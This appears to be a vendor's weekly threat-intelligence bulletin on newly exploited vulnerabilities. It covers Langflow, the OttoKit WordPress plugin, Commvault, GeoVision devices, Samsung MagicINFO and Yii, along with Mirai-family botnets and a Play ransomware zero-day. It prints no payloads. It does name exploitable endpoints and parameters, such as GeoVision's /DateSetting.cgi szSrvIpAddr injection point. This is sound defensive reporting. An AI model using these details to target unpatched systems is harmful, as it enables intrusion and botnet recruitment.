Recent exploitation patterns reveal a sharp shift toward targeting vulnerabilities in widely used business infrastructure. A total of six vulnerabilities have been added to the CISA KEV catalog this week, spanning a wide range of technologies and platforms. Among them are two flaws in end-of-life (EOL) GeoVision devices, alongside critical issues affecting Commvault Command Center, Langflow, the Yii PHP framework, and the FreeType library. Compounding the urgency, active exploitation has been observed in the wild for critical vulnerabilities in the Ottokit WordPress Plugin and the Samsung MagicINFO 9 Server, both of which are widely deployed and internet-facing. These developments stress the importance of proactive patching and the isolation or retirement of unsupported systems.  

Botnet activity surged as malware families like EnemyBot, Sysrv-K, Andoryu, and Androxgh0st exploited security flaws in platforms including Cloud Gateway, GitLab and various PHP-based systems. At the same time, IoT- focused threats such as Bashlite, BrickerBot, Tsunami, and Mirai intensified their targeting of Eir D1000 modems, accelerating the expansion of their botnet infrastructures.  

Threat actors are actively exploiting vulnerabilities in outdated and unpatched systems to deploy Mirai botnet variants and carry out targeted attacks. Discontinued GeoVision IoT devices have been compromised to support Mirai-powered DDoS activity, while a critical flaw in Samsung MagicINFO 9 Server is also being leveraged to deliver the same malware. Additionally, a recently patched Windows vulnerability has been exploited as a zero-day by threat actors linked to the Play ransomware group in a targeted attack on a U.S.-based organization.

Current trending vulnerabilities offer insights into the latest emerging and widely discussed threats, helping to make informed decisions.  

CVE-2025-3248
A Missing Authentication Vulnerability in Langflow has been identified in the /api/v1/validate/code endpoint, allowing unauthenticated remote attackers to execute arbitrary code by sending specially crafted HTTP requests. This flaw rated 9.8 (critical) in severity, affects all Langflow versions prior to 1.3.0. The issue has been resolved in version 1.3.0. As per data from Censys, more than 470 Langflow instances are currently exposed to the internet, with the majority located in United States, Germany, Singapore, India and China. However, it remains uncertain how many of these systems have been updated to the patched version, raising concerns over potential exploitation. The availability of public proof-of-concept and the recent inclusion of this vulnerability in the CISA's Known Exploited Vulnerabilities (KEV) catalog further emphasizes the urgency of mitigation.

CVE-2025-27007
An Unauthenticated Privilege Escalation Vulnerability in the Ottokit WordPress Plugin (formerly known as SureTriggers), allows remote attackers to gain full administrative control of the affected websites without authentication. With a CVSS score of 9.8 (critical), it impacts plugin versions up to and including 1.0.82. This flaw stems from the create_wp_connection function, which is accessible via the plugin's REST API endpoint /wp-json/sure-triggers/v1/connection/create-wp-connection. Due to improper handling of authentication responses and inadequate token validation, attackers can exploit this endpoint by knowing only the administrator's username. Disclosed via Patchstack Zero Day bug bounty program, active exploitation was observed within an hour of its public disclosure. Wordfence has since released a patched version 1.0.83 and reported that its firewall has already blocked over 2,400 exploit attempts targeting this vulnerability.

CVE-2025-27363
An Out-of-Bounds Write Vulnerability in FreeType, an open-source font rendering library, which arises when parsing font subglyph structures associated with TrueType GX and variable font files. This flaw may permit local arbitrary code execution without requiring elevated privileges. With a high CVSS score of 8.1, this vulnerability poses a significant threat, especially given its confirmed exploitation in the wild, first reported by Facebook in March 2025. Google addressed the issue in its May 2025 Android security updates. The vulnerability has also been recently added to the CISA KEV catalog, underscoring the need for timely patching across affected systems.

CVE-2025-34028
A Path Traversal Vulnerability in the Commvault Command Center, allows remote unauthenticated attackers to execute arbitrary code on affected systems. This critical flaw carries the highest CVSS score of 10 and impacts versions 11.38.0 through 11.38.19. The issue has been addressed in patched releases 11.38.20 and 11.38.25. Security firm watchtower publicly disclosed technical details and released a proof-of-concept (PoC) exploit for the vulnerability, significantly increasing the risk of exploitation. Within a week of this disclosure, CISA included this vulnerability to its KEV catalog, reinforcing the need for immediate remediation.  

CVE-2024-6047
An OS Command Injection Vulnerability affecting GeoVision devices, enables a remote, unauthenticated attacker to inject and execute arbitrary system commands. With a critical CVSS score of 9.8, this flaw poses a severe risk to exposed systems. Notably, the impacted GeoVision products have reached end-of-life (EOL) and no longer receive security updates, further compounding the threat.  Akamai reports that this is the first observed instance of active exploitation since the vulnerability initial disclosure in June 2024. The vulnerability has been recently added to the CISA KEV catalog, acknowledging the exploitation activity and emphasizing the need for organizations to decommission or isolate vulnerable devices from accessible networks.  

CVE-2024-7399
A Path Traversal Vulnerability in the server component of Samsung MagicINFO9 allows attackers to write arbitrary files with system-level privileges. With a high CVSS score of 8.1, this issue affects versions prior to 21.1050.0, and Samsung addressed it in August 2024 with the release of MagicINFO version 21.1050. While no exploitation was initially reported at the time of disclosure, the release of a technical analysis and proof-of-concept exploit on April 30, 2025, triggered rapid exploitation in the wild. This surge in activity has significantly increased the risk to unpatched deployments, highlighting the urgency to applying the fix.

CVE-2024-11120
An OS Command Injection Vulnerability in the GeoVision devices allows remote, unauthenticated attackers to execute arbitrary system commands. With a critical CVSS score of 9.8, this flaw represents a significant threat to unpatched or exposed systems. Notably, the impacted GeoVision products have reached end-of-life (EOL) and no longer receive security updates, further compounding the threat. According to Akamai, active exploitation of this vulnerability has now been detected for the first time since its initial disclosure in November 2024. The vulnerability has been recently added to the CISA KEV catalog, urging organizations to either decommission the impacted devices or ensure they are properly isolated from accessible networks to prevent compromise.

CVE-2024-58136
An Improper Protection of Alternate Path Vulnerability in the Yii PHP Framework could allow remote attackers to execute arbitrary code. With a critical CVSS score of 9.0, this vulnerability affects versions prior to 2.0.52 and may impact other products built on Yii, such as Craft CMS. The vulnerability was exploited as a zero-day with attackers chaining it with other flaw, CVE-2025-32432, to gain unauthorized access to servers. It has since been patched in 2.0.52. Due to confirmed exploitation in the wild, it has also been added to the CISA KEV catalog, highlighting the immediate need for remediation.

Telemetry collected from Loginsoft sensors were analyzed and processed to derive insights on what is actively being exploited and actively being scanned.  As source of truth, source IPv4 addresses & payloads can be provided on need-to-know basis.

Identified vulnerabilities exploited by botnets, including recent CVEs logged in Misp. Presenting the top 5 CVEs with payloads suggestive of botnet activities, like utilizing wget with IP addresses.

We proactively monitor the vulnerabilities which are targeted by adversaries. Each vulnerability is humanly studied and mapped with Mitre ATT&CK tactics and techniques. Source of information is derived from our vulnerability intelligence platform collected and curated information from various sources such as Twitter, Telegram, OSINT groups, Blogs, Data leak Sites and more.  

CVE-2025-29824

According to Symantec Threat Hunter Team, a recently patched Windows vulnerability, CVE-2025-29824, was exploited as zero-day by threat actors linked to the Play Ransomware group in a targeted attack against an undisclosed U.S. based organization. This flaw, found in the Common Log File System (CLFS) Driver, is a privilege escalation vulnerability that was addressed by Microsoft in a recent security update.  

Although no ransomware payload was observed in the attack, the intruders deployed Grixba, a custom infostealer tool tied to the Balloonfly group, known for operating the Play Ransomware. Balloonfly has been active since at least mid-2022, carrying out attacks on businesses and critical infrastructure across North America, South America, and Europe.

CVE-2024-6047 and CVE-2024-11120

In early April 2025, Akamai's Security Intelligence Response Team (SIRT) identified exploit activity targeting the /DateSetting.cgi endpoint across its honeypot network. The attack leverages command injection vulnerabilities: CVE-2024-6047 and CVE-2024-11120, affecting discontinued GeoVision IoT devices, specifically exploiting the szSrvIpAddr parameter to execute arbitrary commands without authentication. Although these vulnerabilities were initially disclosed in mid and late 2024, technical details were sparse, and no active exploitation had been publicly reported, until now. Attackers are leveraging this flaw to deploy an ARM-based Mirai variant called LZRD, which identifies itself via a unique console string and exhibits traits typical of other Mirai strains.  

CVE-2024-7399

Active exploitation has been observed targeting Samsung MagicINFO 9 Server, following a recent alert from the SANS Technology Institute. The vulnerability is an unauthenticated remote code execution flaw allows attackers to write arbitrary files as system authority, enabling the deployment of the Mirai botnet on compromised systems. To mitigate the risk of exploitation and ensure operational integrity, users are strongly advised to upgrade their Samsung MagicINFO 9 Server instances to version 21.1050 or newer.

It refers to vulnerabilities discovered and potentially exploited before their official inclusion in the National Vulnerability Database. The LOVI Platform aggregates and distributes data from open sources and social media, currently tracking over 100 security alerts and planning to expand.

1. https://www.cisa.gov/news-events/alerts/2025/05/07/cisa-adds-two-known-exploited-vulnerabilities-catalog
2. https://www.security.com/threat-intelligence/play-ransomware-zero-day
3. https://patchstack.com/articles/additional-critical-ottokit-formerly-suretriggers-vulnerability-patched/  
4. https://labs.watchtowr.com/fire-in-the-hole-were-breaching-the-vault-commvault-remote-code-execution-cve-2025-34028/
5. https://isc.sans.edu/diary/31920  
6. https://www.cisa.gov/news-events/alerts/2025/05/02/cisa-adds-two-known-exploited-vulnerabilities-catalog  
7. https://www.zscaler.com/blogs/security-research/cve-2025-3248-rce-vulnerability-langflow